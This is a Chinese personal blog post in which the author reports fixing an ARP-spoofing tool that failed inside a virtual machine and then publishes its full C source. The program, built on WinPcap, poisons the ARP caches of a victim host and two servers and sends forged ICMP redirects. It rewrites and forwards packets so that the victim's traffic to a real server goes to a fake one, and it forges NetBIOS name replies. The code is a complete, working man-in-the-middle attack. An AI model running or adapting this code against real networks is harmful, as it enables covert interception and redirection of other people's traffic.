注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

今天解决了虚拟机里用ArpCheat欺骗程序的失败的问题  

2014-04-25 15:25:49|  分类: 原理分析 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

之前的ArpCheat程序在主机上能成功,但是virtual pc的vxp里不成功的问题,今天解决了。

用的是收到数据包后,先发构造的icmp主机重定向包给来源,并且本机绑定假mac到相关ip上,即可解决。

但是还是很慢,估计真的要用有限状态机跟踪seq号,才能解决这个效率问题。

还有掉线比以前少了,可能是我里面用的简化版检查和计算的问题。

主要代码如下文件

// ArpCheat.cpp

#include <stdio.h>
#include <pcap.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wpcap.lib")

#include "proto2.h"
#include "chksum.h"

// IP MAC对应表
typedef struct _IPMAC
{
 DWORD A; // 被害者的IP
 unsigned char a[6]; // 被害者的MAC

 DWORD B; // 真服务器的IP
 unsigned char b[6]; // 真服务器的MAC

 DWORD F; // 假服务器的IP
 unsigned char f[6]; // 假服务器的MAC

 DWORD H; // 黑客的IP
 unsigned char h[6]; // 黑客的MAC

} IPMAC, *PIPMAC;

// 目标的ARP缓存表
typedef struct _DESTARP
{
 DWORD DestIp; // 目标的IP
 unsigned char DestMac[6]; // 目标的MAC

 DWORD ArpIp; // 被欺骗的IP
 unsigned char ArpMacFalse[6]; // 不对应的假MAC
 unsigned char ArpMacTrue[6];  // 对应的真MAC
} DESTARP, *PDESTARP;

IPMAC t; // IP MAC对应表
DESTARP tA,tB,tF;
HANDLE hThread[3];

pcap_t *adhandle;

unsigned short ff;
unsigned short bb;

//int flag=1;
int count=0;
u_long if_addr;

unsigned char broadcast[6]={0xff,0xff,0xff,0xff,0xff,0xff}; // 广播MAC
unsigned char invalid_mac[6]={0x00,0x11,0x22,0x33,0x44,0x55}; // 无效MAC

unsigned char NB_Query[]={
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x08, 0x00, 0x45, 0x00,
0x00, 0x4E, 0x00, 0x44, 0x00, 0x00, 0x80, 0x11, 0xBC, 0x08, 0xC0, 0xA8, 0x7E, 0x02, 0xC0, 0xA8,
0x7E, 0xFF, 0x00, 0x89, 0x00, 0x89, 0x00, 0x3A, 0xBC, 0x6C, 0x80, 0x37, 0x01, 0x10, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01
};

unsigned char NB_Response[]={
0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x00, 0x50, 0x56, 0xC0, 0x00, 0x01, 0x08, 0x00, 0x45, 0x00,
0x00, 0x5A, 0x00, 0x31, 0x00, 0x00, 0x40, 0x11, 0xFD, 0x0D, 0xC0, 0xA8, 0x7E, 0x01, 0xC0, 0xA8,
0x7E, 0x02, 0x00, 0x89, 0x00, 0x89, 0x00, 0x46, 0x66, 0xCD, 0x80, 0x37, 0x85, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01, 0x00, 0x04, 0x93, 0xE0,
0x00, 0x06, 0x00, 0x00, 0xC0, 0xA8, 0x7E, 0x01
};

unsigned char icmp_redir_udp[]={
0x00, 0x0B, 0xCD, 0x4E, 0x14, 0x47, 0x00, 0x03, 0xFF, 0x22, 0x04, 0x14, 0x08, 0x00, 0x45, 0x00, 
0x00, 0x38, 0x03, 0xC2, 0x00, 0x00, 0x80, 0x01, 0xA0, 0x90, 0xC0, 0xA8, 0x0A, 0xFA, 0xC0, 0xA8, 
0x0A, 0x28, 0x05, 0x01, 0xAD, 0x78, 0xC0, 0xA8, 0x0A, 0xF7, 0x45, 0x00, 0x00, 0x5A, 0x64, 0x5A, 
0x00, 0x00, 0x80, 0x11, 0x3F, 0xC9, 0xC0, 0xA8, 0x0A, 0x28, 0xC0, 0xA8, 0x0A, 0xF7, 0x00, 0x89, 
0x00, 0x89, 0x00, 0x46, 0x80, 0x8E
};

unsigned char icmp_redir_tcp[]={
0xD0, 0x67, 0xE5, 0x20, 0x04, 0x14, 0x00, 0x03, 0xFF, 0x22, 0x04, 0x14, 0x08, 0x00, 0x45, 0x00,
0x00, 0x38, 0x03, 0xC3, 0x00, 0x00, 0x80, 0x01, 0x9F, 0xC0, 0xC0, 0xA8, 0x0A, 0xFA, 0xC0, 0xA8,
0x0A, 0xF7, 0x05, 0x01, 0x67, 0xC2, 0xC0, 0xA8, 0x0A, 0x28, 0x45, 0x00, 0x00, 0x34, 0x14, 0x45,
0x40, 0x00, 0x40, 0x06, 0x90, 0x0F, 0xC0, 0xA8, 0x0A, 0xF7, 0xC0, 0xA8, 0x0A, 0x28, 0x0B, 0x23,
0x0D, 0x3D, 0xFD, 0xBA, 0xB2, 0x50
};

/*
void dumpbin(unsigned char *s,int n) //输出二进制内容
{
 int i;

 printf("===Begin Dump===");

 for (i=0;i<n;i++ )
 {
  if (i%16 == 0 )
  {
   printf("\n%04x: ",i);
  }
  printf("%02X ",*(s+i));
 }

 printf("\n");
 printf("===End Dump===\n");

}
*/

unsigned short id = 0x03c2;

// 发送ICMP主机重定向H->A GW=B
void send_icmp_Hh_Aa_B(const u_char *pkt_data)
{
 ETHeader *eh,*eh1;
    IPHeader *ih,*ih1;
    TCPHeader *th,*th1;
    UDPHeader *uh,*uh1;
    ICMPHeader *icmph1;
    u_int ip_len;

 eh = (ETHeader *) pkt_data;
 eh1 = (ETHeader *)icmp_redir_udp;
 memcpy(eh1->shost, t.h, 6); // h
 memcpy(eh1->dhost, t.a, 6); // a

 if(eh->type != htons(ETHERTYPE_IP)) return; // 只转发IP包

 ih = (IPHeader *) (pkt_data + 14);
 ip_len = (ih->iphVerLen & 0x0f) * 4;

 ih1 = (IPHeader *) (icmp_redir_udp + 14);
 ih1->ipID = id++;
 ih1->ipSource = t.H; // H
 ih1->ipDestination = t.A; // A
 ih1->ipChecksum = 0;
 ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));

 icmph1 = (ICMPHeader *) ((u_char*)ih1 + ip_len);
 icmph1->gateway = t.B; // B
 memcpy(&icmph1->ipheader, ih, sizeof(IPHeader)+8);
 icmph1->checksum = 0;
 icmph1->checksum = checksum((USHORT *)icmph1, sizeof(ICMPHeader));

 if (pcap_sendpacket(adhandle, (const unsigned char *) icmp_redir_udp, sizeof(icmp_redir_udp)) < 0)
 {
  printf("[-] send packet error\n");
 }
}

// 发送ICMP主机重定向H->F GW=A
void send_icmp_Hh_Ff_A(const u_char *pkt_data)
{
 ETHeader *eh,*eh1;
    IPHeader *ih,*ih1;
    TCPHeader *th,*th1;
    UDPHeader *uh,*uh1;
    ICMPHeader *icmph1;
    u_int ip_len;

 eh = (ETHeader *) pkt_data;
 eh1 = (ETHeader *)icmp_redir_udp;
 memcpy(eh1->shost, t.h, 6); // h
 memcpy(eh1->dhost, t.f, 6); // f

 if(eh->type != htons(ETHERTYPE_IP)) return; // 只转发IP包

 ih = (IPHeader *) (pkt_data + 14);
 ip_len = (ih->iphVerLen & 0x0f) * 4;

 ih1 = (IPHeader *) (icmp_redir_udp + 14);
 ih1->ipID = id++;
 ih1->ipSource = t.H; // H
 ih1->ipDestination = t.F; // F
 ih1->ipChecksum = 0;
 ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));

 icmph1 = (ICMPHeader *) ((u_char*)ih1 + ip_len);
 icmph1->gateway = t.A; // A
 memcpy(&icmph1->ipheader, ih, sizeof(IPHeader)+8);
 icmph1->checksum = 0;
 icmph1->checksum = checksum((USHORT *)icmph1, sizeof(ICMPHeader));

 if (pcap_sendpacket(adhandle, (const unsigned char *) icmp_redir_udp, sizeof(icmp_redir_udp)) < 0)
 {
  printf("[-] send packet error\n");
 }
}

//
// 转换MAC字符串为MAC地址
//
BOOL MacStr2Bin(char *macstr,unsigned char *buff)
{
 char str[100];

 if (strlen(macstr)!=17)
 {
  printf("[-] Error %s len!=17\n",macstr);
  return FALSE;
 }

 for (int i=0;i<6 ;i++ )
 {
  sscanf(macstr+3*i,"%02x",str+i);
 }

 memcpy(buff, str, 6 );
 return TRUE;
}


// 0 1 2 3 4 5 6 7 8 9
//   A a B b F f H h
// 得到IP MAC对应表
void GetAllIPMac(char *v[])
{
 t.A = inet_addr( v[1] );
 MacStr2Bin(v[2], t.a);

 t.B = inet_addr( v[3] );
 MacStr2Bin(v[4], t.b);

 t.F = inet_addr( v[5] );
 MacStr2Bin(v[6], t.f);

 t.H = inet_addr( v[7] );
 MacStr2Bin(v[8], t.h);

}

// 0 1 2 3 4 5 6 7 8 9
//   A a B b F f H h
// 本机静态绑定IP MAC
void SetStatic(char *v[])
{
 char cmd[256];

 for (int i=1; i<9; i+=2)
 {
  // arp -s 1.1.1.1 11-22-33-44-55-66 1.1.1.1
  unsigned char *p;
  p = (unsigned char *) &if_addr;
  sprintf(cmd,"arp -s %s 00-11-22-33-44-55 %d.%d.%d.%d\n", v[i], p[0],p[1],p[2],p[3]);
  //sprintf(cmd,"arp -s %s %s %d.%d.%d.%d\n", v[i], v[i+1], p[0],p[1],p[2],p[3]);
  //printf("%s\n",cmd);
  system(cmd);
 }
}

//
// 发送ARP请求数据包的欺骗线程
//
UINT CheatThread(LPVOID lparam)

 PDESTARP p = (PDESTARP)lparam;
 u_char ucFrame[ARP_LEN];

 // 设置Ethernet头
 ETHeader eh = { 0 };
 memcpy(eh.dhost, p->DestMac, 6);
 memcpy(eh.shost, t.h, 6);
 eh.type = htons(ETHERTYPE_ARP);
 memcpy(ucFrame, &eh, sizeof(eh));

 // 设置Arp头
 ARPHeader ah = { 0 };
 ah.hrd = htons(ARPHRD_ETHER);
 ah.eth_type = htons(ETHERTYPE_IP);
 ah.maclen = 6;
 ah.iplen = 4;
 ah.opcode = htons(ARP_REQUEST);

 memcpy(ah.smac, p->ArpMacFalse, 6); // 不对应的假MAC
 ah.saddr = p->ArpIp; // 被欺骗的IP
 memset(ah.dmac, 0x00, 6);
 ah.daddr = p->DestIp;

 memcpy(&ucFrame[sizeof(ETHeader)], &ah, sizeof(ah));

 while(1)
 {
  if(pcap_sendpacket(adhandle, (const unsigned char *) ucFrame,
   ARP_LEN) < 0)
  {
   printf("[-] Send Packet Error\n");
   return FALSE;
  }

  Sleep(3000); // Sleep 3 sec to restore arp cache
 }
 return TRUE; 
}

// 欺骗所有目标的不对应的IP MAC
void CheatArpCache()
{
 tA.DestIp = t.A;
 memcpy(tA.DestMac, t.a, 6);
 tA.ArpIp = t.B;
 memcpy(tA.ArpMacFalse, t.h, 6);
 memcpy(tA.ArpMacTrue, t.b, 6);
 hThread[0] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tA, NULL, NULL);

 tB.DestIp = t.B;
 memcpy(tB.DestMac, t.b, 6);
 tB.ArpIp = t.A;
 memcpy(tB.ArpMacFalse, t.h, 6);
 memcpy(tB.ArpMacTrue, t.a, 6);
 hThread[1] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);

 tF.DestIp = t.F;
 memcpy(tF.DestMac, t.f, 6);
 tF.ArpIp = t.A;
 memcpy(tF.ArpMacFalse, t.h, 6);
 memcpy(tF.ArpMacTrue, t.a, 6);
 hThread[2] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tF, NULL, NULL);

}

//
//  修改、转发、数据包的例程
//  程序的核心部分
//
void ForwardPacket(pcap_t *adhandle, const u_char *pkt_data, unsigned int pkt_len)
{
 ETHeader *eh;
    IPHeader *ih;
    TCPHeader *th;
    UDPHeader *uh;
    u_int ip_len;
 char szSource[16],szDest[16];
    u_short sport, dport;

 eh = (ETHeader *) pkt_data;

 if(eh->type != htons(ETHERTYPE_IP)) return; // 只转发IP包

 ih = (IPHeader *) (pkt_data + 14); //找到IP头的位置,14为以太头的长度
 ip_len = (ih->iphVerLen & 0x0f) * 4;

 if (ih->ipProtocol == PROTO_TCP) // 处理TCP
 {
  th = (TCPHeader *) ((u_char*)ih + ip_len); // 找到TCP的位置

  // A->B 方向处理
  if (ih->ipDestination==t.B && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.A && memcmp(eh->shost, t.a, 6) == 0)
  {
   send_icmp_Hh_Aa_B(pkt_data); // 发送ICMP主机重定向H->A GW=B

   printf("[TCP] A->B/a->h => A->F/h->f\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.f, 6);

   ih->ipDestination = t.F;

   // 检查和修正
   unsigned long ipchk,tcpchk;

   ipchk= htons(ih->ipChecksum);
   tcpchk= htons(th->checksum);

   if (bb < ff)
   { // IP增加,检查和则减少
    ipchk -= (ff-bb);
    tcpchk -= (ff-bb);
   }
   else
   { // IP减少,检查和则增加
    ipchk += (bb-ff);
    tcpchk += (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   th->checksum = ntohs(tcpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }   
  }

  // A<-F 方向处理
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.F && memcmp(eh->shost, t.f, 6) == 0)
  {
   send_icmp_Hh_Ff_A(pkt_data); // 发送ICMP主机重定向H->F GW=A

   printf("[TCP] F->A/f->h => B->A/h->a\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.a, 6);

   ih->ipSource = t.B;

   // 检查和修正
   unsigned long ipchk,tcpchk;

   ipchk= htons(ih->ipChecksum);
   tcpchk= htons(th->checksum);

   if (ff > bb)
   { // IP减少,检查和则增加
    ipchk += (ff-bb);
    tcpchk += (ff-bb);
   }
   else
   { // IP增加,检查和则减少
    ipchk -= (bb-ff);
    tcpchk -= (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   th->checksum = ntohs(tcpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }
  }
 }
 else if (ih->ipProtocol == PROTO_UDP) // 处理UDP
 {
  uh = (UDPHeader *) ((u_char*)ih + ip_len); // 找到UDP的位置
  
  //
  // A->B 方向处理
  if (ih->ipDestination==t.B && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.A && memcmp(eh->shost, t.a, 6) == 0)
  {
   send_icmp_Hh_Aa_B(pkt_data); // 发送ICMP主机重定向H->A GW=B

   printf("[UDP] A->B/a->h => A->F/h->f\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.f, 6);

   ih->ipDestination = t.F;

   // 检查和修正
   unsigned long ipchk,udpchk;

   ipchk= htons(ih->ipChecksum);
   udpchk= htons(uh->checksum);

   if (bb < ff)
   { // IP增加,检查和则减少
    ipchk -= (ff-bb);
    udpchk -= (ff-bb);
   }
   else
   { // IP减少,检查和则增加
    ipchk += (bb-ff);
    udpchk += (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   uh->checksum = ntohs(udpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }   
  }

  // A<-F 方向处理
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.F && memcmp(eh->shost, t.f, 6) == 0)
  {
   send_icmp_Hh_Ff_A(pkt_data); // 发送ICMP主机重定向H->F GW=A

   printf("[UDP] F->A/f->h => B->A/h->a\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.a, 6);

   ih->ipSource = t.B;

   // 检查和修正
   unsigned long ipchk,udpchk;

   ipchk= htons(ih->ipChecksum);
   udpchk= htons(uh->checksum);

   if (ff > bb)
   { // IP减少,检查和则增加
    ipchk += (ff-bb);
    udpchk += (ff-bb);
   }
   else
   { // IP增加,检查和则减少
    ipchk -= (bb-ff);
    udpchk -= (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   uh->checksum = ntohs(udpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }
  }

  //
  // A<-B 方向处理
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0)
  {
   // B->A/b->h => B->A/h->a
   if (memcmp(eh->shost, t.b, 6) == 0 && uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900)
   {
    // 修改来自B的137响应转发给A
    printf("[UDP] b->h => h->a\n");
    memcpy(eh->shost, t.h, 6);
    memcpy(eh->dhost, t.a, 6);

    if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
    {
     printf("[-] Forward thread send packet error\n");
    }
   }

  }

  // 处理来自A的137查询广播包,如果未开机的情况会发3次来
  if (memcmp(eh->shost, t.a, 6) == 0 && memcmp(eh->dhost, broadcast, 6) == 0)
  {
   NBHeader *nh;
   nh = (NBHeader *) ((u_char *)uh + sizeof(UDPHeader));

   if ( uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900 && nh->Flags==0x1001) // 137=0x0089
   {
    count++;
    if (count > 1)
    {
     ETHeader *eh1;
     IPHeader *ih1;
     UDPHeader *uh1;
     NBHeader *nh1;
     //NBHeader Response;

     eh1 = (ETHeader *) NB_Response;
     ih1 = (IPHeader *) (NB_Response+14);
     uh1 = (UDPHeader *) ((u_char*)ih1 + ip_len);;
     nh1 = (NBHeader *) ((u_char *)uh1 + sizeof(UDPHeader));

     // 修改以太网头
     printf("[UDP] a->* => h->a\n");
     memcpy(eh1->shost, t.h, 6);
     memcpy(eh1->dhost, t.a, 6);

     printf("[UDP] A->* => B->A\n\n");
     ih1->ipSource = t.B;
     ih1->ipDestination = t.A;

     nh1->TransID = nh->TransID; // TransID
     memcpy(nh1->Name, nh->Name, 0x22); // A请求的计算机名
     nh1->AddressIP = t.B;  // 真服务器B,如果用假服务器F的话要结束欺骗才可以

     unsigned char *dataudp = (unsigned char *) ih1 + sizeof(IPHeader)
      + sizeof(UDPHeader);
     int lenudp = ntohs(ih1->ipLength) - (sizeof(IPHeader) + sizeof(UDPHeader));

     ih1->ipChecksum = 0;
     uh1->checksum = 0;
     ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));
     CalcUdpCheckSum(ih1, uh1, (char *)dataudp, lenudp);

     count=0;

     if (pcap_sendpacket(adhandle, (const unsigned char *) NB_Response, sizeof(NB_Response)) < 0)
     {
      printf("[-] Forward thread send packet error\n");
     }

    }
   }
  }
 }
 else // 其他协议处理,如ICMP...
 {
 }
}

//
// pcap_loop的回调函数
// 把接收到的数据传给ForwardPacket函数处理
//
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
{
 ForwardPacket(adhandle, pkt_data,header->len);
}

//
// 重置ARP欺骗,恢复受骗主机的ARP cache
//
void ResetSpoof()
{
 printf("[*] Reseting .....\n");

 TerminateThread(hThread[0], 0); 
 TerminateThread(hThread[1], 0);
 TerminateThread(hThread[2], 0);

 memcpy(tA.ArpMacFalse, tA.ArpMacTrue, 6);
 hThread[0] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tA, NULL, NULL);

 memcpy(tB.ArpMacFalse, tB.ArpMacTrue, 6);
 hThread[1] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);

 memcpy(tF.ArpMacFalse, tF.ArpMacTrue, 6);
 hThread[2] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tF, NULL, NULL);

 printf("[*] Sleep 5s ");
 for(int i = 0; i < 12; i++, Sleep(300))
   printf(".");
 printf("\n");
 TerminateThread(hThread[0], 0); 
 TerminateThread(hThread[1], 0);
 TerminateThread(hThread[2], 0);
 
 system("arp -d\n");

 // pcap_breakloop后,所有对网卡的操作都会使用程序中止,切记
 pcap_breakloop(adhandle);
}


//
// 捕获控制台事件的函数,主要是处理程序中断事务
//
BOOL CtrlHandler( DWORD fdwCtrlType )
{
 switch (fdwCtrlType)
 {
 // Handle the CTRL-C signal.
    case CTRL_C_EVENT:
    case CTRL_CLOSE_EVENT:
    case CTRL_BREAK_EVENT: 
    case CTRL_LOGOFF_EVENT:
    case CTRL_SHUTDOWN_EVENT:
  ResetSpoof(); //  恢复欺骗主机的arp cache
  return TRUE;  
    default:
  return FALSE;
 }
}

/* From tcptraceroute, convert a numeric IP address to a string */
#define IPTOSBUFFERS 12
char *iptos(u_long in)
{
 static char output[IPTOSBUFFERS][3*4+3+1];
 static short which;
 u_char *p;

 p = (u_char *)&in;
 which = (which + 1 == IPTOSBUFFERS ? 0 : which + 1);
 sprintf(output[which], "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
 return output[which];
}

void ifprint(pcap_if_t *d)
{
  pcap_addr_t *a;
  char ip6str[128];

  /* Name */
  printf("%s\n",d->name);

  /* Description */
  if (d->description)
    printf("\tDescription: %s\n",d->description);

  /* Loopback Address*/
  printf("\tLoopback: %s\n",(d->flags & PCAP_IF_LOOPBACK)?"yes":"no");

  /* IP addresses */
  for(a=d->addresses;a;a=a->next) {
    printf("\tAddress Family: #%d\n",a->addr->sa_family);
 
    switch(a->addr->sa_family)
    {
      case AF_INET:
        printf("\tAddress Family Name: AF_INET\n");
        if (a->addr)
  {
   // 接口IP   
   if_addr =((struct sockaddr_in *)a->addr)->sin_addr.s_addr;
   printf("\tAddress: %s\n", iptos(if_addr));
  }
        if (a->netmask)
          printf("\tNetmask: %s\n",iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
        if (a->broadaddr)
          printf("\tBroadcast Address: %s\n",iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
        if (a->dstaddr)
          printf("\tDestination Address: %s\n",iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
        break;

   case AF_INET6:
       printf("\tAddress Family Name: AF_INET6\n");
  break;

   default:
        printf("\tAddress Family Name: Unknown\n");
        break;
    }
  }
  printf("\n");
}


int main(int argc, char *argv[])
{
 pcap_if_t *alldevs;
 pcap_if_t *d;
 int inum;
 int i=0;
 char errbuf[PCAP_ERRBUF_SIZE];

 printf("*** 双向假冒通信测试 V1.5 ***\n");
 printf("*** 按下CTRL+C中断假冒欺骗 ***\n");
 printf("*** hcper @ 2014.4.24修改 ***\n");
 printf("*** 参考:ARPSpoof Ver 3.1b by CoolDiyer ***\n\n");

 if (argc != 9)
 {
  printf("帮助: %s A a B b F f H h\n", argv[0]);
  printf("说明: 黑客H欺骗A使他访问B的时候实际上访问了F!\n");
  printf("大写字母表示IP,小写字母表示MAC\n\n");
  printf("例子: %s " \
    "192.168.10.1 11-11-11-11-11-11 " \
    "192.168.10.2 22-22-22-22-22-22 " \
    "192.168.10.3 33-33-33-33-33-33 " \
    "192.168.10.4 44-44-44-44-44-44\n", argv[0]);
  return 0;
 }
 
 /* Retrieve the device list */
 if(pcap_findalldevs(&alldevs, errbuf) == -1)
 {
  fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
  exit(1);
 }
 
 /* Print the list */
 for(d=alldevs; d; d=d->next)
 {
  printf("%d. %s\n", ++i, d->name);
  if (d->description)
   printf("\t(%s)\n\n", d->description);
  else
   printf("\t(No description available)\n\n");
 }
 
 if(i==0)
 {
  printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
  return -1;
 }
 
 printf("Enter the interface number (1-%d):",i);
 scanf("%d", &inum);
 
 if(inum < 1 || inum > i)
 {
  printf("\nInterface number out of range.\n");
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }
 
 /* Jump to the selected adapter */
 for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);


 /* Open the device */
 /* Open the adapter */
 if ((adhandle= pcap_open_live(d->name, // name of the device
        65536,   // portion of the packet to capture.
           // 65536 grants that the whole packet will be captured on all the MACs.
        1,    // promiscuous mode (nonzero means promiscuous)
        1000,   // read timeout
        errbuf   // error buffer
        )) == NULL)
 {
  fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }

 printf("\n接口信息:\n");
 ifprint(d);
 
 printf("\nlistening on %s...\n", d->description);

 SetConsoleCtrlHandler((PHANDLER_ROUTINE) CtrlHandler, TRUE);

 GetAllIPMac(argv); // 得到所有的相关IP与MAC

 ff = htonl(t.F) & 0xffff; // F的IP最后一字
 bb = htonl(t.B) & 0xffff; // B的IP最后一字

 SetStatic(argv); // 本机设置静态IP MAC对应表
 
 CheatArpCache(); // 欺骗ARP缓存
/*
 printf("t:\n");
 dumpbin((unsigned char *)&t, sizeof(t) ); // debug

 printf("tA:\n");
 dumpbin((unsigned char *)&tA, sizeof(tA) ); // debug

 printf("tB:\n");
 dumpbin((unsigned char *)&tB, sizeof(tB) ); // debug

 printf("tF:\n");
 dumpbin((unsigned char *)&tF, sizeof(tF) ); // debug

 Sleep(2000);
*/
 /* At this point, we don't need any more the device list. Free it */
 pcap_freealldevs(alldevs);

 /* start the capture */
 pcap_loop(adhandle, 0, packet_handler, NULL);
 
 pcap_close(adhandle);

 return 0;
}

  评论这张
 
阅读(443)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017